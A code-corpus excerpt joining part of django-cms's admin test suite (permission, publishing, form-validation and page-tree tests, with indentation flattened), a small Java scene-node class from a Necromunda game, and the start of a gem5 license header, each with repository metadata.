def get_permless(self):
User = get_user_model()
fields = dict(email="permless@django-cms.org", is_staff=True)
if (User.USERNAME_FIELD != 'email'):
fields[User.USERNAME_FIELD] = "permless"
usr = User(**fields)
usr.set_password(getattr(usr, User.USERNAME_FIELD))
usr.save()
return usr
def get_page(self):
return self.page
def test_change_publish_unpublish(self):
page = self.get_page()
permless = self.get_permless()
with self.login_user_context(permless):
request = self.get_request()
response = self.admin_class.publish_page(request, page.pk, "en")
self.assertEqual(response.status_code, 405)
page = self.reload(page)
self.assertFalse(page.is_published('en'))
request = self.get_request(post_data={'no': 'data'})
response = self.admin_class.publish_page(request, page.pk, "en")
self.assertEqual(response.status_code, 403)
page = self.reload(page)
self.assertFalse(page.is_published('en'))
admin_user = self.get_admin()
with self.login_user_context(admin_user):
request = self.get_request(post_data={'no': 'data'})
response = self.admin_class.publish_page(request, page.pk, "en")
self.assertEqual(response.status_code, 302)
page = self.reload(page)
self.assertTrue(page.is_published('en'))
response = self.admin_class.unpublish(request, page.pk, "en")
self.assertEqual(response.status_code, 302)
page = self.reload(page)
self.assertFalse(page.is_published('en'))
def test_change_status_adds_log_entry(self):
page = self.get_page()
admin_user = self.get_admin()
with self.login_user_context(admin_user):
request = self.get_request(post_data={'no': 'data'})
self.assertFalse(LogEntry.objects.count())
response = self.admin_class.publish_page(request, page.pk, "en")
self.assertEqual(response.status_code, 302)
self.assertEqual(1, LogEntry.objects.count())
self.assertEqual(page.pk, int(LogEntry.objects.all()[0].object_id))
def test_change_innavigation(self):
page = self.get_page()
permless = self.get_permless()
admin_user = self.get_admin()
with self.login_user_context(permless):
request = self.get_request()
response = self.admin_class.change_innavigation(request, page.pk)
self.assertEqual(response.status_code, 405)
with self.login_user_context(permless):
request = self.get_request(post_data={'no': 'data'})
response = self.admin_class.change_innavigation(request, page.pk)
self.assertEqual(response.status_code, 403)
with self.login_user_context(permless):
request = self.get_request(post_data={'no': 'data'})
self.assertRaises(Http404, self.admin_class.change_innavigation,
request, page.pk + 100)
with self.login_user_context(permless):
request = self.get_request(post_data={'no': 'data'})
response = self.admin_class.change_innavigation(request, page.pk)
self.assertEqual(response.status_code, 403)
with self.login_user_context(admin_user):
request = self.get_request(post_data={'no': 'data'})
old = page.in_navigation
response = self.admin_class.change_innavigation(request, page.pk)
self.assertEqual(response.status_code, 204)
page = self.reload(page)
self.assertEqual(old, not page.in_navigation)
def test_publish_page_requires_perms(self):
permless = self.get_permless()
with self.login_user_context(permless):
request = self.get_request()
request.method = "POST"
response = self.admin_class.publish_page(request, Page.objects.all()[0].pk, "en")
self.assertEqual(response.status_code, 403)
def test_remove_plugin_requires_post(self):
ph = Placeholder.objects.create(slot='test')
plugin = add_plugin(ph, 'TextPlugin', 'en', body='test')
admin_user = self.get_admin()
with self.login_user_context(admin_user):
endpoint = self.get_delete_plugin_uri(plugin)
response = self.client.get(endpoint)
self.assertEqual(response.status_code, 200)
def test_move_language(self):
page = self.get_page()
source, target = list(page.placeholders.all())[:2]
col = add_plugin(source, 'MultiColumnPlugin', 'en')
sub_col = add_plugin(source, 'ColumnPlugin', 'en', target=col)
col2 = add_plugin(source, 'MultiColumnPlugin', 'de')
admin_user = self.get_admin()
with self.login_user_context(admin_user):
data = {
'plugin_id': sub_col.pk,
'placeholder_id': source.id,
'plugin_parent': col2.pk,
'plugin_language': 'de'
}
endpoint = self.get_move_plugin_uri(sub_col)
response = self.client.post(endpoint, data)
self.assertEqual(response.status_code, 200)
sub_col = CMSPlugin.objects.get(pk=sub_col.pk)
self.assertEqual(sub_col.language, "de")
self.assertEqual(sub_col.parent_id, col2.pk)
def test_preview_page(self):
permless = self.get_permless()
with self.login_user_context(permless):
request = self.get_request()
self.assertRaises(Http404, self.admin_class.preview_page, request, 404, "en")
page = self.get_page()
page.publish("en")
Page.set_homepage(page)
base_url = page.get_absolute_url()
with self.login_user_context(permless):
request = self.get_request('/?public=true')
response = self.admin_class.preview_page(request, page.pk, 'en')
self.assertEqual(response.status_code, 302)
self.assertEqual(response['Location'], '%s?%s&language=en' % (base_url, get_cms_setting('CMS_TOOLBAR_URL__EDIT_ON')))
request = self.get_request()
response = self.admin_class.preview_page(request, page.pk, 'en')
self.assertEqual(response.status_code, 302)
self.assertEqual(response['Location'], '%s?%s&language=en' % (base_url, get_cms_setting('CMS_TOOLBAR_URL__EDIT_ON')))
current_site = Site.objects.create(domain='django-cms.org', name='django-cms')
page.site = current_site
page.save()
page.publish("en")
self.assertTrue(page.is_home)
response = self.admin_class.preview_page(request, page.pk, 'en')
self.assertEqual(response.status_code, 302)
self.assertEqual(response['Location'],
'http://django-cms.org%s?%s&language=en' % (base_url, get_cms_setting('CMS_TOOLBAR_URL__EDIT_ON')))
def test_too_many_plugins_global(self):
conf = {
'body': {
'limits': {
'global': 1,
},
},
}
admin_user = self.get_admin()
url = admin_reverse('cms_page_add_plugin')
with self.settings(CMS_PERMISSION=False, CMS_PLACEHOLDER_CONF=conf):
page = create_page('somepage', 'nav_playground.html', 'en')
body = page.placeholders.get(slot='body')
add_plugin(body, 'TextPlugin', 'en', body='text')
with self.login_user_context(admin_user):
data = {
'plugin_type': 'TextPlugin',
'placeholder_id': body.pk,
'plugin_language': 'en',
}
response = self.client.post(url, data)
self.assertEqual(response.status_code, HttpResponseBadRequest.status_code)
def test_too_many_plugins_type(self):
conf = {
'body': {
'limits': {
'TextPlugin': 1,
},
},
}
admin_user = self.get_admin()
url = admin_reverse('cms_page_add_plugin')
with self.settings(CMS_PERMISSION=False, CMS_PLACEHOLDER_CONF=conf):
page = create_page('somepage', 'nav_playground.html', 'en')
body = page.placeholders.get(slot='body')
add_plugin(body, 'TextPlugin', 'en', body='text')
with self.login_user_context(admin_user):
data = {
'plugin_type': 'TextPlugin',
'placeholder_id': body.pk,
'plugin_language': 'en',
'plugin_parent': '',
}
response = self.client.post(url, data)
self.assertEqual(response.status_code, HttpResponseBadRequest.status_code)
def test_edit_title_dirty_bit(self):
language = "en"
admin_user = self.get_admin()
page = create_page('A', 'nav_playground.html', language)
page_admin = PageAdmin(Page, None)
page_admin._current_page = page
page.publish("en")
draft_page = page.get_draft_object()
admin_url = reverse("admin:cms_page_edit_title_fields", args=(
draft_page.pk, language
))
post_data = {
'title': "A Title"
}
with self.login_user_context(admin_user):
self.client.post(admin_url, post_data)
draft_page = Page.objects.get(pk=page.pk).get_draft_object()
self.assertTrue(draft_page.is_dirty('en'))
def test_edit_title_languages(self):
language = "en"
admin_user = self.get_admin()
page = create_page('A', 'nav_playground.html', language)
page_admin = PageAdmin(Page, None)
page_admin._current_page = page
page.publish("en")
draft_page = page.get_draft_object()
admin_url = reverse("admin:cms_page_edit_title_fields", args=(
draft_page.pk, language
))
post_data = {
'title': "A Title"
}
with self.login_user_context(admin_user):
self.client.post(admin_url, post_data)
draft_page = Page.objects.get(pk=page.pk).get_draft_object()
self.assertTrue(draft_page.is_dirty('en'))
def test_page_form_leak(self):
language = "en"
admin_user = self.get_admin()
request = self.get_request('/', 'en')
request.user = admin_user
page = create_page('A', 'nav_playground.html', language, menu_title='menu title')
page_admin = PageAdmin(Page, site)
page_admin._current_page = page
edit_form = page_admin.get_form(request, page)
add_form = page_admin.get_form(request, None)
self.assertEqual(edit_form.base_fields['menu_title'].initial, 'menu title')
self.assertEqual(add_form.base_fields['menu_title'].initial, None)
class NoDBAdminTests(CMSTestCase):
@property
def admin_class(self):
return site._registry[Page]
def test_lookup_allowed_site__exact(self):
self.assertTrue(self.admin_class.lookup_allowed('site__exact', '1'))
def test_lookup_allowed_published(self):
self.assertTrue(self.admin_class.lookup_allowed('published', value='1'))
class PluginPermissionTests(AdminTestsBase):
def setUp(self):
self._page = create_page('test page', 'nav_playground.html', 'en')
self._placeholder = self._page.placeholders.all()[0]
def _get_admin(self):
User = get_user_model()
fields = dict(email="admin@django-cms.org", is_staff=True, is_active=True)
if (User.USERNAME_FIELD != 'email'):
fields[User.USERNAME_FIELD] = "admin"
admin_user = User(**fields)
admin_user.set_password('admin')
admin_user.save()
return admin_user
def _get_page_admin(self):
return admin.site._registry[Page]
def _give_permission(self, user, model, permission_type, save=True):
codename = '%s_%s' % (permission_type, model._meta.object_name.lower())
user.user_permissions.add(Permission.objects.get(codename=codename))
def _give_page_permission_rights(self, user):
self._give_permission(user, PagePermission, 'add')
self._give_permission(user, PagePermission, 'change')
self._give_permission(user, PagePermission, 'delete')
def _get_change_page_request(self, user, page):
return type('Request', (object,), {
'user': user,
'path': base.URL_CMS_PAGE_CHANGE % page.pk
})
def _give_cms_permissions(self, user, save=True):
for perm_type in ['add', 'change', 'delete']:
for model in [Page, Title]:
self._give_permission(user, model, perm_type, False)
gpp = GlobalPagePermission.objects.create(
user=user,
can_change=True,
can_delete=True,
can_change_advanced_settings=False,
can_publish=True,
can_change_permissions=False,
can_move_page=True,
)
gpp.sites = Site.objects.all()
if save:
user.save()
def _create_plugin(self):
plugin = add_plugin(self._placeholder, 'TextPlugin', 'en')
return plugin
def test_plugin_edit_wrong_url(self):
"""User tries to edit a plugin using a random url. 404 response returned"""
plugin = self._create_plugin()
_, normal_guy = self._get_guys()
if get_user_model().USERNAME_FIELD == 'email':
self.client.login(username='test@test.com', password='test@test.com')
else:
self.client.login(username='test', password='test')
self._give_permission(normal_guy, Text, 'change')
url = '%s/edit-plugin/%s/' % (admin_reverse('cms_page_edit_plugin', args=[plugin.id]), plugin.id)
response = self.client.post(url, dict())
self.assertEqual(response.status_code, HttpResponseNotFound.status_code)
self.assertTrue("Plugin not found" in force_text(response.content))
class AdminFormsTests(AdminTestsBase):
def test_clean_overwrite_url(self):
user = AnonymousUser()
user.is_superuser = True
user.pk = 1
request = type('Request', (object,), {'user': user})
with self.settings():
data = {
'title': 'TestPage',
'slug': 'test-page',
'language': 'en',
'overwrite_url': '/overwrite/url/',
'site': Site.objects.get_current().pk,
'template': get_cms_setting('TEMPLATES')[0][0],
'published': True
}
form = PageForm(data)
self.assertTrue(form.is_valid(), form.errors.as_text())
instance = form.save()
instance.permission_user_cache = user
instance.permission_advanced_settings_cache = True
Title.objects.set_or_create(request, instance, form, 'en')
form = PageForm(data, instance=instance)
self.assertTrue(form.is_valid(), form.errors.as_text())
def test_missmatching_site_parent_dotsite(self):
site0 = Site.objects.create(domain='foo.com', name='foo.com')
site1 = Site.objects.create(domain='foo2.com', name='foo.com')
parent_page = Page.objects.create(
template='nav_playground.html',
site=site0)
new_page_data = {
'title': 'Title',
'slug': 'slug',
'language': 'en',
'site': site1.pk,
'template': get_cms_setting('TEMPLATES')[0][0],
'reverse_id': '',
'parent': parent_page.pk,
}
form = PageForm(data=new_page_data, files=None)
self.assertFalse(form.is_valid())
self.assertIn(u"Site doesn't match the parent's page site",
form.errors['__all__'])
def test_form_errors(self):
new_page_data = {
'title': 'Title',
'slug': 'home',
'language': 'en',
'site': 10,
'template': get_cms_setting('TEMPLATES')[0][0],
'reverse_id': '',
}
form = PageForm(data=new_page_data, files=None)
self.assertFalse(form.is_valid())
site0 = Site.objects.create(domain='foo.com', name='foo.com', pk=2)
page1 = api.create_page("test", get_cms_setting('TEMPLATES')[0][0], "fr", site=site0)
new_page_data = {
'title': 'Title',
'slug': 'home',
'language': 'en',
'site': 1,
'template': get_cms_setting('TEMPLATES')[0][0],
'reverse_id': '',
'parent': page1.pk,
}
form = PageForm(data=new_page_data, files=None)
self.assertFalse(form.is_valid())
new_page_data = {
'title': 'Title',
'slug': '#',
'language': 'en',
'site': 1,
'template': get_cms_setting('TEMPLATES')[0][0],
'reverse_id': '',
}
form = PageForm(data=new_page_data, files=None)
self.assertFalse(form.is_valid())
new_page_data = {
'title': 'Title',
'slug': 'home',
'language': 'pp',
'site': 1,
'template': get_cms_setting('TEMPLATES')[0][0],
'reverse_id': '',
'parent':'',
}
form = PageForm(data=new_page_data, files=None)
self.assertFalse(form.is_valid())
page2 = api.create_page("test", get_cms_setting('TEMPLATES')[0][0], "en")
new_page_data = {
'title': 'Title',
'slug': 'test',
'language': 'en',
'site': 1,
'template': get_cms_setting('TEMPLATES')[0][0],
'reverse_id': '',
'parent':'',
}
form = PageForm(data=new_page_data, files=None)
self.assertFalse(form.is_valid())
page3 = api.create_page("test", get_cms_setting('TEMPLATES')[0][0], "en", parent=page2)
page3.title_set.update(path="hello/")
page3 = page3.reload()
new_page_data = {
'title': 'Title',
'slug': 'test',
'language': 'en',
'site': 1,
'template': get_cms_setting('TEMPLATES')[0][0],
'reverse_id': '',
'parent':'',
}
form = PageForm(data=new_page_data, files=None, instance=page3)
self.assertFalse(form.is_valid())
def test_reverse_id_error_location(self):
''' Test moving the reverse_id validation error to a field specific one '''
# this is the Reverse ID we'll re-use to break things.
dupe_id = 'p1'
curren_site = Site.objects.get_current()
create_page('Page 1', 'nav_playground.html', 'en', reverse_id=dupe_id)
page2 = create_page('Page 2', 'nav_playground.html', 'en')
# Assemble a bunch of data to test the page form
page2_data = {
'language': 'en',
'site': curren_site.pk,
'reverse_id': dupe_id,
'template': 'col_two.html',
}
form = AdvancedSettingsForm(
data=page2_data,
instance=page2,
files=None,
)
self.assertFalse(form.is_valid())
# reverse_id is the only item that is in __all__ as every other field
# has it's own clean method. Moving it to be a field error means
# __all__ is now not available.
self.assertNotIn('__all__', form.errors)
# In moving it to it's own field, it should be in form.errors, and
# the values contained therein should match these.
self.assertIn('reverse_id', form.errors)
self.assertEqual(1, len(form.errors['reverse_id']))
self.assertEqual([u'A page with this reverse URL id exists already.'],
form.errors['reverse_id'])
page2_data['reverse_id'] = ""
form = AdvancedSettingsForm(
data=page2_data,
instance=page2,
files=None,
)
self.assertTrue(form.is_valid())
admin_user = self._get_guys(admin_only=True)
# reset some of page2_data so we can use cms.api.create_page
page2 = page2.reload()
page2.site = curren_site
page2.save()
with self.login_user_context(admin_user):
# re-reset the page2_data for the admin form instance.
page2_data['reverse_id'] = dupe_id
page2_data['site'] = curren_site.pk
# post to the admin change form for page 2, and test that the
# reverse_id form row has an errors class. Django's admin avoids
# collapsing these, so that the error is visible.
resp = self.client.post(base.URL_CMS_PAGE_ADVANCED_CHANGE % page2.pk, page2_data)
self.assertContains(resp, '<div class="form-row errors field-reverse_id">')
def test_advanced_settings_endpoint(self):
admin_user = self.get_superuser()
site = Site.objects.get_current()
page = create_page('Page 1', 'nav_playground.html', 'en')
page_data = {
'language': 'en',
'site': site.pk,
'template': 'col_two.html',
}
path = admin_reverse('cms_page_advanced', args=(page.pk,))
with self.login_user_context(admin_user):
en_path = path + u"?language=en"
redirect_path = admin_reverse('cms_page_changelist') + '?language=en'
response = self.client.post(en_path, page_data)
self.assertRedirects(response, redirect_path)
self.assertEqual(Page.objects.get(pk=page.pk).template, 'col_two.html')
# Now switch it up by adding german as the current language
# Note that german has not been created as page translation.
page_data['language'] = 'de'
page_data['template'] = 'nav_playground.html'
with self.login_user_context(admin_user):
de_path = path + u"?language=de"
redirect_path = admin_reverse('cms_page_change', args=(page.pk,)) + '?language=de'
response = self.client.post(de_path, page_data)
# Assert user is redirected to basic settings.
self.assertRedirects(response, redirect_path)
# Make sure no change was made
self.assertEqual(Page.objects.get(pk=page.pk).template, 'col_two.html')
de_translation = create_title('de', title='Page 1', page=page.reload())
de_translation.slug = ''
de_translation.save()
# Now try again but slug is set to empty string.
page_data['language'] = 'de'
page_data['template'] = 'nav_playground.html'
with self.login_user_context(admin_user):
de_path = path + u"?language=de"
response = self.client.post(de_path, page_data)
# Assert user is not redirected because there was a form error
self.assertEqual(response.status_code, 200)
# Make sure no change was made
self.assertEqual(Page.objects.get(pk=page.pk).template, 'col_two.html')
de_translation.slug = 'someslug'
de_translation.save()
# Now try again but with the title having a slug.
page_data['language'] = 'de'
page_data['template'] = 'nav_playground.html'
with self.login_user_context(admin_user):
en_path = path + u"?language=de"
redirect_path = admin_reverse('cms_page_changelist') + '?language=de'
response = self.client.post(en_path, page_data)
self.assertRedirects(response, redirect_path)
self.assertEqual(Page.objects.get(pk=page.pk).template, 'nav_playground.html')
def test_advanced_settings_endpoint_fails_gracefully(self):
admin_user = self.get_superuser()
site = Site.objects.get_current()
page = create_page('Page 1', 'nav_playground.html', 'en')
page_data = {
'language': 'en',
'site': site.pk,
'template': 'col_two.html',
}
path = admin_reverse('cms_page_advanced', args=(page.pk,))
# It's important to test fields that are validated
# automatically by Django vs fields that are validated
# via the clean() method by us.
# Fields validated by Django will not be in cleaned data
# if they have an error so if we rely on these in the clean()
# method then an error will be raised.
# So test that the form short circuits if there's errors.
page_data['application_urls'] = 'TestApp'
page_data['site'] = '1000'
with self.login_user_context(admin_user):
de_path = path + u"?language=de"
response = self.client.post(de_path, page_data)
# Assert user is not redirected because there was a form error
self.assertEqual(response.status_code, 200)
page = page.reload()
# Make sure no change was made
self.assertEqual(page.application_urls, None)
self.assertEqual(page.site.pk, site.pk)
def test_create_page_type(self):
page = create_page('Test', 'static.html', 'en', published=True, reverse_id="home")
for placeholder in Placeholder.objects.all():
add_plugin(placeholder, TextPlugin, 'en', body='<b>Test</b>')
page.publish('en')
self.assertEqual(Page.objects.count(), 2)
self.assertEqual(CMSPlugin.objects.count(), 4)
superuser = self.get_superuser()
with self.login_user_context(superuser):
response = self.client.get(
"%s?copy_target=%s&language=%s" % (admin_reverse("cms_page_add_page_type"), page.pk, 'en'))
self.assertEqual(response.status_code, 302)
self.assertEqual(Page.objects.count(), 3)
self.assertEqual(Page.objects.filter(reverse_id="page_types").count(), 1)
page_types = Page.objects.get(reverse_id='page_types')
url = response.url if hasattr(response, 'url') else response['Location']
expected_url_params = QueryDict(
'target=%s&position=first-child&add_page_type=1©_target=%s&language=en' % (page_types.pk, page.pk))
response_url_params = QueryDict(urlparse(url).query)
self.assertDictEqual(expected_url_params, response_url_params)
response = self.client.get("%s?copy_target=%s&language=%s" % (
admin_reverse("cms_page_add_page_type"), page.pk, 'en'), follow=True)
self.assertEqual(response.status_code, 200)
# test no page types if no page types there
response = self.client.get(admin_reverse('cms_page_add'))
self.assertNotContains(response, "page_type")
# create out first page type
page_data = {
'title': 'type1', 'slug': 'type1', '_save': 1, 'template': 'static.html', 'site': 1,
'language': 'en'
}
response = self.client.post(
"%s?target=%s&position=first-child&add_page_type=1©_target=%s&language=en" % (
URL_CMS_PAGE_ADD, page_types.pk, page.pk
), data=page_data)
self.assertEqual(response.status_code, 302)
self.assertEqual(Page.objects.count(), 4)
self.assertEqual(CMSPlugin.objects.count(), 6)
response = self.client.get(admin_reverse('cms_page_add'))
self.assertContains(response, "page_type")
# no page types available if you use the copy_target
response = self.client.get("%s?copy_target=%s&language=en" % (admin_reverse('cms_page_add'), page.pk))
self.assertNotContains(response, "page_type")
def test_render_edit_mode(self):
from django.core.cache import cache
cache.clear()
homepage = create_page('Test', 'static.html', 'en', published=True)
Page.set_homepage(homepage)
for placeholder in Placeholder.objects.all():
add_plugin(placeholder, TextPlugin, 'en', body='<b>Test</b>')
user = self.get_superuser()
self.assertEqual(Placeholder.objects.all().count(), 4)
with self.login_user_context(user):
output = force_text(
self.client.get(
'/en/?%s' % get_cms_setting('CMS_TOOLBAR_URL__EDIT_ON')
).content
)
self.assertIn('<b>Test</b>', output)
self.assertEqual(Placeholder.objects.all().count(), 9)
self.assertEqual(StaticPlaceholder.objects.count(), 2)
for placeholder in Placeholder.objects.all():
add_plugin(placeholder, TextPlugin, 'en', body='<b>Test</b>')
output = force_text(
self.client.get(
'/en/?%s' % get_cms_setting('CMS_TOOLBAR_URL__EDIT_ON')
).content
)
self.assertIn('<b>Test</b>', output)
def test_tree_view_queries(self):
from django.core.cache import cache
cache.clear()
for i in range(10):
create_page('Test%s' % i, 'col_two.html', 'en', published=True)
for placeholder in Placeholder.objects.all():
add_plugin(placeholder, TextPlugin, 'en', body='<b>Test</b>')
user = self.get_superuser()
with self.login_user_context(user):
with self.assertNumQueries(FuzzyInt(12, 22)):
force_text(self.client.get(URL_CMS_PAGE))
def test_smart_link_published_pages(self):
admin, staff_guy = self._get_guys()
page_url = URL_CMS_PAGE_PUBLISHED # Not sure how to achieve this with reverse...
create_page('home', 'col_two.html', 'en', published=True)
with self.login_user_context(staff_guy):
multi_title_page = create_page('main_title', 'col_two.html', 'en', published=True,
overwrite_url='overwritten_url',
menu_title='menu_title')
title = multi_title_page.get_title_obj()
title.page_title = 'page_title'
title.save()
multi_title_page.save()
publish_page(multi_title_page, admin, 'en')
# Non ajax call should return a 403 as this page shouldn't be accessed by anything else but ajax queries
self.assertEqual(403, self.client.get(page_url).status_code)
self.assertEqual(200,
self.client.get(page_url, HTTP_X_REQUESTED_WITH='XMLHttpRequest').status_code
)
# Test that the query param is working as expected.
self.assertEqual(1, len(json.loads(self.client.get(page_url, {'q':'main_title'},
HTTP_X_REQUESTED_WITH='XMLHttpRequest').content.decode("utf-8"))))
self.assertEqual(1, len(json.loads(self.client.get(page_url, {'q':'menu_title'},
HTTP_X_REQUESTED_WITH='XMLHttpRequest').content.decode("utf-8"))))
self.assertEqual(1, len(json.loads(self.client.get(page_url, {'q':'overwritten_url'},
HTTP_X_REQUESTED_WITH='XMLHttpRequest').content.decode("utf-8"))))
self.assertEqual(1, len(json.loads(self.client.get(page_url, {'q':'page_title'},
HTTP_X_REQUESTED_WITH='XMLHttpRequest').content.decode("utf-8"))))
class AdminPageEditContentSizeTests(AdminTestsBase):
"""
System user count influences the size of the page edit page,
but the users are only 2 times present on the page
The test relates to extra=0
at PagePermissionInlineAdminForm and ViewRestrictionInlineAdmin
"""
def test_editpage_contentsize(self):
"""
Expected a username only 2 times in the content, but a relationship
between usercount and pagesize
"""
with self.settings(CMS_PERMISSION=True):
admin_user = self.get_superuser()
PAGE_NAME = 'TestPage'
USER_NAME = 'test_size_user_0'
current_site = Site.objects.get(pk=1)
page = create_page(PAGE_NAME, "nav_playground.html", "en", site=current_site, created_by=admin_user)
page.save()
self._page = page
with self.login_user_context(admin_user):
url = base.URL_CMS_PAGE_PERMISSION_CHANGE % self._page.pk
response = self.client.get(url)
self.assertEqual(response.status_code, 200)
old_response_size = len(response.content)
old_user_count = get_user_model().objects.count()
# create additionals user and reload the page
get_user_model().objects.create_user(username=USER_NAME, email=USER_NAME + '@django-cms.org',
password=USER_NAME)
user_count = get_user_model().objects.count()
more_users_in_db = old_user_count < user_count
# we have more users
self.assertTrue(more_users_in_db, "New users got NOT created")
response = self.client.get(url)
new_response_size = len(response.content)
page_size_grown = old_response_size < new_response_size
# expect that the pagesize gets influenced by the useramount of the system
self.assertTrue(page_size_grown, "Page size has not grown after user creation")
# usernames are only 2 times in content
text = smart_str(response.content, response.charset)
foundcount = text.count(USER_NAME)
# 2 forms contain usernames as options
self.assertEqual(foundcount, 2,
"Username %s appeared %s times in response.content, expected 2 times" % (
USER_NAME, foundcount))
class AdminPageTreeTests(AdminTestsBase):
def test_move_node(self):
admin_user, staff = self._get_guys()
page_admin = self.admin_class
alpha = create_page('Alpha', 'nav_playground.html', 'en', published=True)
beta = create_page('Beta', TEMPLATE_INHERITANCE_MAGIC, 'en', published=True)
gamma = create_page('Gamma', TEMPLATE_INHERITANCE_MAGIC, 'en', published=True)
delta = create_page('Delta', TEMPLATE_INHERITANCE_MAGIC, 'en', published=True)
# Current structure:
# <root>
# ⊢ Alpha
# ⊢ Beta
# ⊢ Gamma
# ⊢ Delta
# Move Beta to be a child of Alpha
data = {
'id': beta.pk,
'position': 0,
'target': alpha.pk,
}
with self.login_user_context(admin_user):
request = self.get_request(post_data=data)
response = page_admin.move_page(request, page_id=beta.pk)
data = json.loads(response.content.decode('utf8'))
self.assertEqual(response.status_code, 200)
self.assertEqual(data['status'], 200)
self.assertEqual(alpha.reload().get_descendants().count(), 1)
# Current structure:
# <root>
# ⊢ Alpha
# ⊢ Beta
# ⊢ Gamma
# ⊢ Delta
# Move Gamma to be a child of Beta
data = {
'id': gamma.pk,
'position': 0,
'target': beta.pk,
}
with self.login_user_context(admin_user):
request = self.get_request(post_data=data)
response = page_admin.move_page(request, page_id=gamma.pk)
data = json.loads(response.content.decode('utf8'))
self.assertEqual(response.status_code, 200)
self.assertEqual(data['status'], 200)
self.assertEqual(alpha.reload().get_descendants().count(), 2)
self.assertEqual(beta.reload().get_descendants().count(), 1)
# Current structure:
# <root>
# ⊢ Alpha
# ⊢ Beta
# ⊢ Gamma
# ⊢ Delta
# Move Delta to be a child of Beta
data = {
'id': delta.pk,
'position': 0,
'target': gamma.pk,
}
with self.login_user_context(admin_user):
request = self.get_request(post_data=data)
response = page_admin.move_page(request, page_id=delta.pk)
data = json.loads(response.content.decode('utf8'))
self.assertEqual(response.status_code, 200)
self.assertEqual(data['status'], 200)
self.assertEqual(alpha.reload().get_descendants().count(), 3)
self.assertEqual(beta.reload().get_descendants().count(), 2)
self.assertEqual(gamma.reload().get_descendants().count(), 1)
# Current structure:
# <root>
# ⊢ Alpha
# ⊢ Beta
# ⊢ Gamma
# ⊢ Delta
# Move Beta to the root as node #1 (positions are 0-indexed)
data = {
'id': beta.pk,
'position': 1,
}
with self.login_user_context(admin_user):
request = self.get_request(post_data=data)
response = page_admin.move_page(request, page_id=beta.pk)
data = json.loads(response.content.decode('utf8'))
self.assertEqual(response.status_code, 200)
self.assertEqual(data['status'], 200)
self.assertEqual(alpha.reload().get_descendants().count(), 0)
self.assertEqual(beta.reload().get_descendants().count(), 2)
self.assertEqual(gamma.reload().get_descendants().count(), 1)
# Current structure:
# <root>
# ⊢ Alpha
# ⊢ Beta
# ⊢ Gamma
# ⊢ Delta
# Move Beta to be a child of Alpha again
data = {
'id': beta.pk,
'position': 0,
'target': alpha.pk,
}
with self.login_user_context(admin_user):
request = self.get_request(post_data=data)
response = page_admin.move_page(request, page_id=beta.pk)
data = json.loads(response.content.decode('utf8'))
self.assertEqual(response.status_code, 200)
self.assertEqual(data['status'], 200)
self.assertEqual(alpha.reload().get_descendants().count(), 3)
self.assertEqual(beta.reload().get_descendants().count(), 2)
self.assertEqual(gamma.reload().get_descendants().count(), 1)
# Current structure:
# <root>
# ⊢ Alpha
# ⊢ Beta
# ⊢ Gamma
# ⊢ Delta
# Move Gamma to the root as node #1 (positions are 0-indexed)
data = {
'id': gamma.pk,
'position': 1,
}
with self.login_user_context(admin_user):
request = self.get_request(post_data=data)
response = page_admin.move_page(request, page_id=gamma.pk)
data = json.loads(response.content.decode('utf8'))
self.assertEqual(response.status_code, 200)
self.assertEqual(data['status'], 200)
self.assertEqual(alpha.reload().get_descendants().count(), 1)
self.assertEqual(beta.reload().get_descendants().count(), 0)
self.assertEqual(gamma.reload().get_descendants().count(), 1)
# Current structure:
# <root>
# ⊢ Alpha
# ⊢ Beta
# ⊢ Gamma
# ⊢ Delta
# Move Delta to the root as node #1 (positions are 0-indexed)
data = {
'id': delta.pk,
'position': 1,
}
with self.login_user_context(admin_user):
request = self.get_request(post_data=data)
response = page_admin.move_page(request, page_id=delta.pk)
data = json.loads(response.content.decode('utf8'))
self.assertEqual(response.status_code, 200)
self.assertEqual(data['status'], 200)
self.assertEqual(alpha.reload().get_descendants().count(), 1)
self.assertEqual(beta.reload().get_descendants().count(), 0)
self.assertEqual(gamma.reload().get_descendants().count(), 0)
# Current structure:
# <root>
# ⊢ Alpha
# ⊢ Beta
# ⊢ Delta
# ⊢ Gamma
# Move Gamma to be a child of Delta
data = {
'id': gamma.pk,
'position': 1,
'target': delta.pk,
}
with self.login_user_context(admin_user):
request = self.get_request(post_data=data)
response = page_admin.move_page(request, page_id=gamma.pk)
data = json.loads(response.content.decode('utf8'))
self.assertEqual(response.status_code, 200)
self.assertEqual(data['status'], 200)
self.assertEqual(alpha.reload().get_descendants().count(), 1)
self.assertEqual(beta.reload().get_descendants().count(), 0)
self.assertEqual(gamma.reload().get_descendants().count(), 0)
self.assertEqual(delta.reload().get_descendants().count(), 1)
# Final structure:
# <root>
# ⊢ Alpha
# ⊢ Beta
# ⊢ Delta
# ⊢ Gamma
| timgraham/django-cms | cms/tests/test_admin.py | Python | bsd-3-clause | 63,904 |
package necromunda;
import java.util.*;
import com.jme3.material.Material;
import com.jme3.scene.*;
public class PathNode extends NecromundaNode {
public PathNode(String name) {
super(name);
}
public void setMaterial(Material material) {
Spatial base = getChild("pathBoxGeometry");
base.setMaterial(material);
}
public List<Geometry> getBoundingVolumes() {
List<Geometry> boundingVolumes = new ArrayList<Geometry>();
Geometry boundingVolume = (Geometry)getChild("pathBoxGeometry");
boundingVolumes.add(boundingVolume);
return boundingVolumes;
}
@Override
public List<Spatial> getVisualSpatials() {
List<Spatial> spatials = new ArrayList<Spatial>();
spatials.add(getChild("pathBoxGeometry"));
return spatials;
}
}
| Tibotanum/Necromunda | src/necromunda/PathNode.java | Java | bsd-3-clause | 749 |
# Copyright (c) 2010-2012 ARM Limited
# All rights reserved.
#
# The license below extends only to copyright in the software and shall
# not be construed as granting a license to any other intellectual
# property including but not limited to intellectual property relating
# to a hardware implementation of the functionality of the software
# licensed hereunder. You may use the software subject to the license
# terms below provided that you ensure that this notice is replicated
# unmodified and in its entirety in all distributions of the software,
# modified or unmodified, in source code or in binary form.
#
# Copyright (c) 2010-2011 Advanced Micro Devices, Inc.
# Copyright (c) 2006-2008 The Regents of The University of Michigan
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met: redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer;
# redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution;
# neither the name of the copyright holders nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
